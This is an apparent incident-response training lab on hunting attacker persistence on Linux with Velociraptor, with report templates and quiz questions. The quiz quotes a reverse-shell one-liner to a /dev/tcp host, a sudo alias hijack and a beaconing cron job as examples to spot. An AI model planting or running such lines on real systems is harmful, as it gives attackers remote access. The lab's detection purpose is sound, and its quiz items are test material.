What You'll Learn
- Systematically enumerate all common Linux persistence locations using Velociraptor
- Identify malicious cron jobs, systemd services, SSH keys, shell configuration backdoors, and init scripts
- Distinguish between legitimate system persistence and attacker-installed mechanisms
- Use Velociraptor artifacts to collect and analyze persistence data from multiple locations simultaneously
- Produce a comprehensive persistence finding report documenting all discovered mechanisms
Lab Overview
| Detail | Value |
|---|---|
| Lab Profile | lab-velociraptor |
| Containers | Velociraptor Server, Velociraptor Client |
| Estimated Time | 60 minutes |
| Difficulty | Intermediate–Advanced |
| Browser Access | Velociraptor GUI (port 8889) |
| Pre-Loaded Data | Multiple planted persistence mechanisms on Linux client |
| Deliverable | Persistence finding report listing all discovered mechanisms with risk ratings |
Why Persistence Hunting Matters. Finding the initial compromise is only half the battle. Attackers almost always install multiple persistence mechanisms to survive reboots, user logoffs, and partial remediation. If you find one backdoor but miss the other three, the attacker regains access within minutes. This lab teaches you to sweep EVERY persistence location systematically.
The Scenario
An incident responder found and removed a cryptominer from the endpoint velociraptor-client. The endpoint was patched and the initial exploit vector closed. However, three days later, the cryptominer returned. The attacker had installed multiple persistence mechanisms that the initial remediation missed.
Your job: Use Velociraptor to conduct a comprehensive persistence hunt — check every common persistence location on the endpoint and find ALL the mechanisms the attacker installed. There are multiple planted persistence mechanisms across different categories.
Part 1: Cron-Based Persistence
Step 1: Log Into Velociraptor
- URL: Provided via the "Open Lab" button (port 8889)
- Username:
admin - Password:
cyberblue
Navigate to the connected client.
Step 2: Collect All Cron Jobs
- Create a new collection using artifact:
Linux.Sys.Crontab - Launch and review results
Cron jobs can exist in multiple locations:
/etc/crontab— system-wide cron table/etc/cron.d/— drop-in cron files/etc/cron.daily/,/etc/cron.hourly/— periodic directories/var/spool/cron/crontabs/— per-user cron tables
Step 3: Analyze Cron Results
For each cron entry, evaluate:
- Is the schedule unusual? (every minute, every 5 minutes = beaconing)
- Is the command path suspicious? (
/tmp/, hidden directories) - Is output suppressed? (
> /dev/null 2>&1= hiding evidence) - Is the cron file owned by an unexpected user?
Document each suspicious cron entry:
CRON PERSISTENCE FINDINGS
═════════════════════════
Entry 1:
Location: [file path]
Schedule: [cron expression — human readable]
Command: [full command]
Suspicious Indicators: [list red flags]
Risk: [Critical / High / Medium / Low]
Part 2: Systemd Service Persistence
Step 4: Collect Systemd Services
Create a new collection to enumerate systemd services. Look at:
/etc/systemd/system/— admin-installed services/lib/systemd/system/— package-installed services/run/systemd/system/— runtime services
Step 5: Identify Suspicious Services
Red flags for systemd services:
- Service name mimics legitimate services but is slightly different (e.g.,
sshd-helper,cron-update) - ExecStart points to hidden directories or
/tmp/ - Restart=always ensures the malware restarts if killed
- WantedBy=multi-user.target ensures it starts on boot
- Service file was recently created (check timestamps)
Document suspicious services:
SYSTEMD PERSISTENCE FINDINGS
═════════════════════════════
Service 1:
Unit File: [path]
Service Name: [name]
ExecStart: [command]
Restart Policy: [always/on-failure/no]
WantedBy: [target]
Suspicious Indicators: [list red flags]
Risk: [Critical / High / Medium / Low]
Service Name Disguise. Attackers frequently name their malicious services to blend in with legitimate ones. Names like system-update, network-health, log-rotate-helper all sound legitimate but could be hiding malware. Always check the ExecStart path — that's where the truth is.
Part 3: SSH Key Persistence
Step 6: Collect SSH Authorized Keys
Collect authorized SSH keys from all user accounts:
/root/.ssh/authorized_keys/home/*/.ssh/authorized_keys
Step 7: Analyze SSH Keys
For each authorized key found, evaluate:
- Does the key comment match a known admin? (e.g.,
admin@company.comvs.kali@attack-box) - Is the key type appropriate? (RSA, ED25519 — check for abnormally short key lengths)
- When was the key added? (correlate with compromise timeline)
- Are there multiple keys for a single user? (unexpected extras may be attacker-added)
Document suspicious keys:
SSH KEY PERSISTENCE FINDINGS
════════════════════════════
Key 1:
Location: [authorized_keys path]
Key Type: [RSA/ED25519/etc]
Key Comment: [email/identifier]
Suspicious Indicators: [list red flags]
Risk: [Critical / High / Medium / Low]
Part 4: Shell Configuration Persistence
Step 8: Collect Shell Configs
Collect and examine:
/root/.bashrc/root/.bash_profile/root/.profile/home/*/.bashrc/etc/profile/etc/profile.d/*.sh/etc/bash.bashrc
Step 9: Identify Backdoor Commands
Attackers add lines to shell configs that execute on every login:
- Reverse shell one-liners appended to
.bashrc - Environment variable modifications that redirect commands
- Alias overrides (e.g.,
alias sudo='backdoor && sudo') - Source commands that load malicious scripts
Document any suspicious entries:
SHELL CONFIG PERSISTENCE FINDINGS
══════════════════════════════════
Entry 1:
File: [config file path]
Line: [suspicious line content]
Purpose: [what this line does]
Trigger: [when does this execute?]
Risk: [Critical / High / Medium / Low]
Diff Against Known-Good. The fastest way to find shell config backdoors is to compare against a known-good baseline. If you know what a clean .bashrc looks like on this OS, any additions stand out immediately. In practice, configuration management tools (Ansible, Puppet) maintain these baselines.
Part 5: Init Scripts and Additional Locations
Step 10: Check Init Scripts
Legacy init scripts in /etc/init.d/ may also contain persistence:
- Scripts that don't match installed packages
- Recently modified scripts with backdoor commands appended
Step 11: Check Additional Persistence Vectors
Also investigate:
/etc/rc.local— runs commands at boot/etc/ld.so.preload— shared library preloading (rootkit technique)- at jobs — one-time scheduled tasks (
atqto list) - Kernel modules — loaded modules (
lsmodequivalent)
Part 6: Compile the Persistence Report
Step 12: Create the Complete Report
PERSISTENCE HUNT REPORT
═══════════════════════
Endpoint: [hostname]
Client ID: [Velociraptor client ID]
Investigation Date: [today's date]
Analyst: [your name]
Trigger: Cryptominer returned after remediation
SUMMARY
───────
Total persistence mechanisms found: [count]
Categories affected: [Cron / Systemd / SSH / Shell Config / Init / Other]
Highest risk finding: [description]
DETAILED FINDINGS
─────────────────
[Number each finding sequentially]
#1 — [Finding Title]
Category: [Cron / Systemd / SSH Key / Shell Config / Init Script]
Location: [exact file path]
Content: [malicious entry/configuration]
Risk Level: [Critical / High / Medium / Low]
Remediation: [specific steps to remove this persistence]
#2 — [Finding Title]
...
REMEDIATION PLAN
────────────────
Priority Order:
1. [Most critical — remove first]
2. [Second priority]
3. [Third priority]
...
VERIFICATION STEPS
──────────────────
After removing all persistence, verify by:
1. Reboot the endpoint
2. Re-run all Velociraptor collections
3. Confirm no malicious entries remain
4. Monitor for 24 hours for re-infection
Deliverable Checklist
Before completing the lab, ensure you have:
- Cron Persistence — checked all cron locations and documented findings
- Systemd Persistence — enumerated services and identified suspicious units
- SSH Key Persistence — reviewed all authorized_keys files
- Shell Config Persistence — examined bashrc, profile, and related files
- Init/Additional Persistence — checked rc.local, init.d, and other vectors
- Complete Report — all findings documented with risk levels and remediation steps
Key Takeaways
- Attackers install multiple persistence mechanisms to survive remediation — finding one doesn't mean you've found them all
- Systematic hunting requires checking EVERY persistence location, not just the obvious ones
- Cron jobs, systemd services, SSH keys, and shell configs are the four most common Linux persistence vectors
- Disguised service names and hidden directories are the attacker's primary evasion techniques
- A persistence hunt report must include remediation steps AND verification procedures
What's Next
In Lab 8.4 — SIEM to Endpoint, you'll combine SIEM analysis with endpoint investigation. Starting from a Wazuh alert, you'll pivot to Velociraptor to collect the full forensic picture — building the bridge between detection and investigation.
Lab Challenge: Persistence Hunt
10 questions · 70% to pass
Your incident response removed a cryptominer but it returned 3 days later. What is the MOST likely explanation?
You find a cron entry: '*/2 * * * * /var/tmp/.fonts/check.sh > /dev/null 2>&1'. List ALL suspicious indicators in this entry.
A systemd service has Restart=always and ExecStart=/opt/.hidden/svc-monitor. Why is the Restart=always directive significant for persistence?
You find an SSH key in /root/.ssh/authorized_keys with the comment 'kali@attack-box'. What does this reveal?
Examining /root/.bashrc, you find this line appended at the end: 'bash -i >& /dev/tcp/10.0.0.5/9999 0>&1 &'. When does this persistence trigger?
You need to check cron persistence across the entire system. Which locations should you examine? Select the MOST complete answer.
An attacker names their malicious systemd service 'network-health-monitor.service'. Why is this naming strategy effective?
You found a line in /etc/profile.d/system-env.sh: 'alias sudo="/tmp/.x/logger && sudo"'. What does this persistence technique accomplish?
After finding 5 persistence mechanisms, what should be the FIRST item in your remediation priority list?
After removing all persistence mechanisms, what verification step is MOST critical to confirm successful remediation?
0/10 answered